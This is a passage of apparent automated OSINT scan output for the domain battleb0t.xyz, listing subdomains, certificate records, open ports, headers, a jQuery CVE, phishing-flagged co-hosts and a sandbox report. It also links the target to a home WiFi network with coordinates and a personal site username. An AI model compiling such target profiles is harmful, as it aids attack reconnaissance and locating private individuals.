advertising or solicitations via direct mail, electronic mail, or by
telephone; or (2) enable high volume, automated, electronic processes
that apply to Networksolutions.com (or its systems). The compilation,
repackaging, dissemination or other use of this data is expressly
prohibited without the prior written consent of Networksolutions.com.
Networksolutions.com reserves the right to modify these terms at any time.
By submitting this query, you agree to abide by these terms.
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
|
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | alex-home (Net ID: 00:01:E3:58:87:1F) | 50.1188, 8.6843 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Picsart (Category: art)
https://picsart.com/u/ayshoo | ayshoo |
| 2023-05-12 02:44:18 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | [{u'pubkey_sha256': u'b1d8ad495b85281ccdd8ee8835d1b0223d8372b54869daf463e92de6ed172160', u'cert_sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'revoked': False, u'not_after': u'2023-05-14T15:23:50Z', u'not_before': u'2023-02-13T15:23:51Z', u'cert': {u'data': u'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', u'sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'type': u'cert'}, u'dns_names': [u'nuke.battleb0t.xyz'], u'tbs_sha256': u'2c51d3eac2fd15713d1b21dd3bb3fdf96ca51847d8b13529deb5504b935d64ba', u'id': u'4818192950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'2307411ab1a35cbd27d910826dd73a859c805fd0ba153a66badcd9b93076677b', u'cert_sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'revoked': False, u'not_after': u'2023-05-25T03:02:52Z', u'not_before': u'2023-02-24T03:02:53Z', u'cert': {u'data': u'MIIFKjCCBBKgAwIBAgISA5eZXGCsQGj4st4KZ3rat9EWMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzAyNTNaFw0yMzA1MjUwMzAyNTJaMB4xHDAaBgNVBAMTE2ZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDtvNBxdfnBUXlJ+CVs4kt6BeErbHlEmP+yzLzX2iclKTfHuoDL4Xy4TTeivJNE67xi/0fLIeo9BUwEV4KTW6klKfuYM7AEdKq8mmRex+Js5ewq50Br4XWTObPPuOkRKebRnghWVBafwR0f9fbKSDqUUwMdv1KvbiedgI3wVyjU8AE09DlZSt+fAEeHmjk4wY+EigILsm5cNqL2NebSI2spsRWqhqNb6zDMr7jf1Q6Pjil+DSEo0NJMcVsZAZvcuZCIffxdPnJE5kYR3eb9pUKjByTnKdkpHPNyd4vLC99FNAuBqADe8BN0G78vYa1lcyk+BbXDkCiMlu/Lswa6m2v3AgMBAAGjggJMMIICSDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFMSFgqNe7U1U6Q29Aqxnsvrz4Vg/MB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMB4GA1UdEQQXMBWCE2ZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggECBgorBgEEAdZ5AgQCBIHzBIHwAO4AdQC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBlpBHAAAEAwBGMEQCICjxcLLm9aGcwyq5mLfK3kYGig39XVFiap6vpxj4VtGwAiAhpNN7m5SlM1cl6vnpa33bPptwrJlHu2Ch2NSf4J/0RAB1AK33vvp8/xDIi509nB4+GGq0Zyldz7EMJMqFhjTr3IKKAAABhoGWkIMAAAQDAEYwRAIgPen/cKNLJEXeMs3B69ZoUOiQORdwZS/DjifvjwosEkICIGO9t4hTEa50wIw+3Zov1uU0pIyiq0OMZH6b0o6QCM5gMA0GCSqGSIb3DQEBCwUAA4IBAQB+MVu1xgwWJwv1GrOAp+9eXxuHOLeKvlxLKj8oK0+HX8K007e++Cj1FcezPz1AtAOklQYBGlgfdTZL7GVa4P2wv0Hj/1dO3QVHLOV0yFpYGdZTYfaNDhkpXd2yE+jFTH5o3PK0BVoTjtIuTl6BEKWGjzAw92FKb1wXDaTvEwIFSLAYrJzfJHAS40SsMVT1tpL07LbnFpMjx7h+UVz3BTMcDnqzPe0hA9K8pb8QgR9MedQ6c7mTn1eLmOo+dDlwmT06wPJN4VXt3ElOpjmlguotbukXxnJ17BBy0Mk+uTBpvC9wBjy6MbbBDEXmkoh4VjrUDNIyuEk388RtFWlUmQrZ', u'sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'type': u'cert'}, u'dns_names': [u'fluid.battleb0t.xyz'], u'tbs_sha256': u'8146e2bbb69c6bf3a769558c8c5ae10b8e6243d42611ba7db2c4f0b16bf71146', u'id': u'4865007011', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'5a0559923d0fdaac1fc6a74472ffcb94c92e25a29d8d9a48166bcad2947f18e1', u'cert_sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'revoked': False, u'not_after': u'2023-05-25T03:05:10Z', u'not_before': u'2023-02-24T03:05:11Z', u'cert': {u'data': u'MIIFMTCCBBmgAwIBAgISBJEIZbRWlOOJN2vI7lr89IBSMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzA1MTFaFw0yMzA1MjUwMzA1MTBaMCExHzAdBgNVBAMTFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCXS5qUM658XpEb2FQiye1Pjdwc6oLnwWa4DnrXaX6XESwapQ5kFhLVlLMj8jbUT+vVMlCs5NdmG+PakXkEZvQt+j5F9EiRGo2AgsrdZhjN8p2HDZYJNvCQUHSzj9HUq+U8uqatV2IiK2DebnYEAl36UoC3YWvKiQ5ROMPyTcGPPlwvhux67sSpCWf+OjYs9HHdY1LHfiQTO/hkrA8XZYtPEtu6i5bXp9Nc/Y/pJrDB086upICbjZsf9spKiE++7SgvRRKN7ShK4dcK0cxPOA/6ky2NSpI6iIIBJKdiUpWIy/Uh604fFFn7oPNTbG4g4coLg0Y2NMYiFxvY5oIkaMplAgMBAAGjggJQMIICTDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFNUp10YCZXNl/PWnfC5vlnnYZ6TmMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCEGA1UdEQQaMBiCFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggEDBgorBgEEAdZ5AgQCBIH0BIHxAO8AdgC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBmKzyAAAEAwBHMEUCICWgaft/PmN9oILwvZn6/4Qgr8WGgSRL98ur+169a4dWAiEAilZEKCsL5dY69BV+Cjy6gEc40xNl1o6o5QEE0+3XKCQAdQB6MoxU2LcttiDqOOBSHumEFnAyE4VNO9IrwTpXo1LrUgAAAYaBmK0EAAAEAwBGMEQCIEhQdyenjelORFvktFZQ+yD8yP0PS9xoCKRWpUv1pUezAiBBtKAPIhxp6PP7YLKBYWLg3Sg3E350KyZ04f3lTSlh5zANBgkqhkiG9w0BAQsFAAOCAQEAYbTvc/w81jb1dYAMM4uaBQvE73IdaXSV/QqEvbi5PBKH0+sttdJjKilgWcQRHA/D+3kvikNXOGLYLmg0u2wOeuP4PfXBBaVtk7mzSCKOozlm5qWe3OKYNX6z4ceyFrewLnBQTuqT0PhcaWwb0j7u2mQfrZfIvhc4pu2SnjvbZ8iwX+av/fdXknuHPb/EwSETusTYhaNj3JDu3z0qvANOuhuMDBZ+WOOsf9w7QBgfdJjVxPoymZWgZB5bTaj1eTMuP0PcjQ59KCV0epMnUy5rrk2BwTzgzUICbfza81JX1bFwjhqRFcgbk81AuP8p58YFrWOMyOzX6Ygzo11DodW5IA==', u'sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'type': u'cert'}, u'dns_names': [u'oldfluid.battleb0t.xyz'], u'tbs_sha256': u'11231ecf169618aac453b5e600bca74016c90998389238bc78e25a336ea53b60', u'id': u'4865013513', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'b65f3ba1cf72aeba89e3a802dee04c06a05e779c0cfeacdd6cb8cefb55c4e2da', u'cert_sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'revoked': False, u'not_after': u'2023-05-26T01:39:24Z', u'not_before': u'2023-02-25T01:39:25Z', u'cert': {u'data': u'MIIFNTCCBB2gAwIBAgISBLY5M6/eHjLz/C523LwIUYYQMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjUwMTM5MjVaFw0yMzA1MjYwMTM5MjRaMBgxFjAUBgNVBAMTDWJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCrxxsM7cYB+Oqps88IF0+iy3w0xGYS5u/zmBd5yWXuZkwfmpJ9M+4H+i4VYve08x/VTy6xZ6hJQr/jzJq3MEbCaPUoqWRpb0xLZCTJ3O1Gn6Qfwu9vNtC8aSe44tYYcEAstPXuj/cNjG4Dkudd1j68u8lbKBCgWvY39eGeFSNybo5pAQmkjKTJ19sFAZBIS5AgjDh6CmB0eRgmMI5gCxe5JKCA3z8UANMJ5zRHNWN8VNKgneFX0csT0zwwJJeO6jQAn8xsDGr3VLxeYNxGMcIJ3tnD42MejxzFkJDo2oa+ffHDHxqGaZsL4LIMRwjIklkrZi/6oTihLxBl9pf9FoczAgMBAAGjggJdMIICWTAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFGNOFYVWWqSUAsIWQqSll5o4AleXMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCsGA1UdEQQkMCKCDWJhdHRsZWIwdC54eXqCEXd3dy5iYXR0bGViMHQueHl6MEwGA1UdIARFMEMwCAYGZ4EMAQIBMDcGCysGAQQBgt8TAQEBMCgwJgYIKwYBBQUHAgEWGmh0dHA6Ly9jcHMubGV0c2VuY3J5cHQub3JnMIIBBgYKKwYBBAHWeQIEAgSB9wSB9ADyAHcAejKMVNi3LbYg6jjgUh7phBZwMhOFTTvSK8E6V6NS61IAAAGGhnCAVAAABAMASDBGAiEAh/Y8suDCe/RZMkn/hO7hrF2hfoTeuKySO5eYbccRB9ACIQCOoXkcH72OFd6rl/5A4dnCHD5VPTnfiLg+MDLqz1Gg8wB3AOg+0No+9QY1MudXKLyJa8kD08vREWvs62nhd31tBr1uAAABhoZwgDYAAAQDAEgwRgIhAMDKSjoBecX3TRhscOh0pPwxXkb/27xVeRxr0yp3M5J9AiEAs2yzzZRuQAdUQ84z4D/CSUjcGSNE5J2LfuF/Rs4Y77YwDQYJKoZIhvcNAQELBQADggEBALLjqCzluns+jvveBcnb3xDhOkrUyOkWdjExuB2H40IVXNkB0eMhFJYNA9arKrtu2pcQ/rEDSKt+bXuWbeA6WumULoOuP6iljCU6qcUdY4oNVU1UyDoX1HJydnidKSo73vUKTNhEgh8aKcxcLL9+23F8UOOR/pU/04dfMDdI7GO2oawzrGMFso9t7p4urFBZ6UFG0nFlBRdC2T4hndeQOaaPLehK1P9tnjLGggWPpLV0tHDfKEtQyBs2Gq7Pe6uSI+Z3l/JHpLBS8p3PvmiiivIv8GYL0zQqx4o1xBwzLeWQ3lanl4Z8l8lFj5lhIgA9qrKHDTW7TPP4HPiZwejRMMY=', u'sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'type': u'cert'}, u'dns_names': [u'battleb0t.xyz', u'www.battleb0t.xyz'], u'tbs_sha256': u'5d9c34221e2de124f32114bf34c005fc414285d1b7cc7cab0bb0bd4e745c7797', u'id': u'4869370950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afa |
| 2023-05-12 03:03:55 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | ebrahemsamir.github.io | 185.199.108.153 |
| 2023-05-12 03:13:03 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0001vrn.github.io]
https://www.openphish.com/feed.txt | 0001vrn.github.io |
| 2023-05-12 03:08:57 | Vulnerability - CVE Medium | Yes | Tool - Retire.js | 0 | 0 | 4 | 0 | None | CVE-2020-11022
https://nvd.nist.gov/vuln/detail/CVE-2020-11022
Score: 6.1
Description: In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. | http://code.jquery.com/jquery-3.2.1.js |
| 2023-05-12 02:44:22 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | oldfluid.battleb0t.xyz | CN=oldfluid.battleb0t.xyz |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.204): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c53def4fc411045-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.71.14 |
| 2023-05-12 02:44:15 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | 185.199.111.153:443 | 185.199.111.153 |
| 2023-05-12 03:09:53 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.97 |
| 2023-05-12 02:53:42 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "X_Cache_Hits": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "Via": ["1.1 varnish"], "X_Github_Request_Id": ["7C6A:7C80:2850A39:3919A91:645D8DCD"], "Age": ["1827"], "Vary": ["Accept-Encoding"], "X_Served_By": ["cache-chi-kigq8000031-CHI"], "X_Cache_Hits": ["1"], "X_Timer": ["S1683854577.750981,VS0,VE4"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8d-239b\""], "X_Fastly_Request_Id": ["01d5273de282686844c6b1cd964008c7007600d9"], "Content_Type": ["text/html; charset=utf-8"], "Date": ["<REDACTED>"], "X_Cache": ["HIT"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "Server": ["GitHub.com"], "Accept_Ranges": ["bytes"]} | 185.199.109.153 |
| 2023-05-12 02:54:12 | Linked URL - Internal | No | Web Spider | 4 | 0 | 1 | 0 | None | https://battleb0t.xyz/ | battleb0t.xyz |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:8443 | 172.67.135.9 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/ein_2.png | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:08:49 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.112 | 35.229.48.116 |
| 2023-05-12 03:00:32 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | fl@e9.lb | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://macinstruct.sertfidancilik.com/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2434.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"o.ss2.us"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.rootg2.amazontrust.com"\n "x1.c.lencr.org"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"o.ss2.us"\n "ocsp.rootg2.amazontrust.com"\n "x1.c.lencr.org"\n "ocsp.rootca1.amazontrust.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.7.33:443"\n "65.8.165.119:443"\n "104.196.30.220:443"\n "172.67.176.214:443"\n "65.8.165.51:80"\n "23.61.169.89:80"\n "65.8.165.104:80"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_dc4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_dc4_IESQMMUTEX_0_519"\n "IsoScope_dc4_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_dc4_ConnHashTable<3524>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3524"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_dc4_IESQMMUTEX_0_303"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_dc4_IE_EarlyTabStart_0x530_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\MSIMGSIZECacheMutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data Windows 2000/XP setup 4817 bytes 1 file at 0x2c +A "disallowedcert.stl" number 1 1 datablock 0x1 compression"\n "Cab2433.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62397 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62397 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "4L134F50.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4L134F50.txt]- [targetUID: 00000000-00003524]\n Dropped file: "XVLMDIKC.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\XVLMDIKC.txt]- [targetUID: 00000000-00003524]\n Dropped file: "CVDBBF2V.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CVDBBF2V.txt]- [targetUID: 00000000-00003524]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpsmacinstruct.sertfidancilik.com" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00003384]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003524]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003384]\n "logo_1_.png" has type "PNG image data 128 x 128 8-bit/color RGBA 